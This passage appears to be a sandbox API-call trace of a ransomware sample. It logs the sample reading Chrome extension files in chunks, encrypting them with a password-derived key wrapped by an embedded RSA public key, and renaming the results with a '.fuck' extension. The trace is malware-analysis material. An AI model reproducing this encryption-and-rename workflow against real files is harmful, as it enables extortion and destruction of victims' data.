hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.156] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.156] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.156] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.156] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.156] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.157] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.157] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.157] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.157] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.157] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.157] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.157] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.157] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.157] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.157] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.157] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x36b, lpOverlapped=0x0) returned 1 [0262.157] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x36b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x370) returned 1 [0262.157] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x370, lpOverlapped=0x0) returned 1 [0262.157] CloseHandle (hObject=0x5d64) returned 1 [0262.157] CloseHandle (hObject=0x5d50) returned 1 [0262.158] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), bFailIfExists=0) returned 1 [0262.163] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js", dwFileAttributes=0x0) returned 1 [0262.164] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.gsg")) returned 1 [0262.166] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.fuck")) returned 1 [0262.167] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0262.167] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0262.167] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.167] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0262.167] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0262.167] GetLastError () returned 0x0 [0262.167] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js")) returned 0x20 [0262.168] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js", dwFileAttributes=0x80) returned 1 [0262.168] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0262.170] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.171] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.gsg", dwFileAttributes=0x2) returned 1 [0262.171] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0262.173] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0262.173] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.173] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.173] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fc40) returned 1 [0262.173] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.173] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0262.173] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e730a8) returned 1 [0262.174] CryptImportPublicKeyInfo (in: hCryptProv=0x2e730a8, dwCertEncodingType=0x1, pInfo=0x2eae2c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae2f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae2f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7dcc0) returned 1 [0262.174] CryptEncrypt (in: hKey=0x2e7dcc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0262.174] CryptEncrypt (in: hKey=0x2e7dcc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72cf0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e72cf0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0262.174] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e72cf0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e72cf0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0262.175] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.207] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.207] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.222] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.223] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.223] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.223] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.223] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.223] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.224] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.224] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.224] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.224] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.224] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.224] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.224] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.224] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.224] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.224] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.224] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.224] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.225] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.225] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.225] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.225] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.225] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.225] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.226] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.226] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 